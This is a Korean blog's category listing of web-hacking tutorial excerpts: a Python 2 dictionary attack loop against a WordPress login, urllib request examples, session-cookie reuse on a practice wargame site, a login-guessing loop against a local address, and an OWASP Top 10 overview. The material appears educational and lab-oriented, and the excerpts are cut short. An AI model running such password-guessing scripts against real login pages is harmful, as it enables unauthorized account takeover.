'해킹&amp;보안/웹 해킹' 카테고리의 글 목록

[5] 패스워드 크래킹

패스워드 크래킹은 아이디를 이미 알고 있다는 가정하에 진행하며 사전대입 공격이므로 좋은 사전 파일을 미리 구해놓는 것이 좋다.이를 방지하기 위해서는 임계치를 설정해둬야한다.import urllib import urllib2 url = "http://server/wordpress/wp-login.php" id = "python" wordlist = open('wordlist.txt', 'r') passwords = wordlist.readlines() for password in passwords: password = password.strip() values = {'log' : id, 'pwd' : password} data = urllib.urlencode(values) request = urllib2..

해킹&보안/웹 해킹 8년 전

[4] 웹 페이지 호출 예제 (urllib, urllib2)

import urllib import urllib2 url = "http://server/wordpress/wp-login.php" values = {'log':'python', 'pwd':'python1'} headers = {'User-Agent': 'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)'} data = urllib.urlencode(values) request = urllib2.Request(url, data, headers) response = urllib2.urlopen(request) print "#URL:%s" % response.geturl() print "#CODE:%s" % response.getcode() print "#INFO:%s" %..

해킹&보안/웹 해킹 8년 전

[3] 쿠키정보 유지하기(urllib2)

import urllib import urllib2 #cookie 값 얻기 url = "http://webhacking.kr/index.html?enter=1" loginInfo={"id":"아이디", "pw":"암호"} loginInfo = urllib.urlencode(loginInfo) req = urllib2.Request(url, loginInfo) response = urllib2.urlopen(req) cookie = response.headers.get('Set-Cookie') #쿠키값 다시 적용시켜 세션 유지하기 url2 = "http://webhacking.kr/challenge/web/web-02/" req = urllib2.Request(url2) req.add_header('coo..

해킹&보안/웹 해킹 8년 전

[2] Request Message 보내기(urllib2)

import urllibimport urllib2 url = "http://192.168.129.129/board/login_ck.asp" req = urllib2.Request(url) data = {"memberid" : id, "pass1" : ""} ##POST 방식 data = urllib.urlencode(data) req = urllib2.Request(url, data) response = urllib2.urlopen(req) the_page = response.read() if the_page.find("HELLO") != -1: break ------> POST 방식 import urllib import urllib2 response = urllib2.urlopen('http://tes..

해킹&보안/웹 해킹 8년 전

[1] 웹 해킹 개요

1. 웹 해킹의 개요 1) 개요 HTTP 프로토콜을 기반으로 하는 웹은 은 인터넷 서비스의 중심이며 대부분 80포트를 개방하여 사용하고 있다. URL 뒤에 별도의 포트를 지정하지 않으면 80포트를 사용하는 것으로 인식한다. 웹 서버는 80포트를 통해 텍스트, 이미지 등 다양한 자료들을 송수신하며 중요정보까지 웹 서버로 전송한다.OWASP(the Open Web Application Security Project)라는 국제 웹 보안 표준 기구에서는 10대 웹 애플리케이션 취약점(OWASP Top 10)을 발표한다. 2013년 OWASP top 10 목록은 다음과 같다.1. Injection- DB, 운영체제, LDAP에 명령어나 질의문을 전송할 때 신뢰할 수 없는 데이터를 사용함으로써 인젝션 공격을 수행...

해킹&보안/웹 해킹 8년 전

일	월	화	수	목	금	토
		1	2	3	4	5
6	7	8	9	10	11	12
13	14	15	16	17	18	19
20	21	22	23	24	25	26
27	28	29	30

내 블로그 - 관리자 홈 전환	`Q` `Q`
새 글 쓰기	`W` `W`

글 수정 (권한 있는 경우)	`E` `E`
댓글 영역으로 이동	`C` `C`

이 페이지의 URL 복사	`S` `S`
맨 위로 이동	`T` `T`
티스토리 홈 이동	`H` `H`
단축키 안내	`Shift` + `/` `⇧` + `/`

From the bottom

해킹&보안웹 해킹 검색 결과

[5] 패스워드 크래킹

[4] 웹 페이지 호출 예제 (urllib, urllib2)

[3] 쿠키정보 유지하기(urllib2)

[2] Request Message 보내기(urllib2)

[1] 웹 해킹 개요

티스토리툴바

단축키

내 블로그

블로그 게시글

모든 영역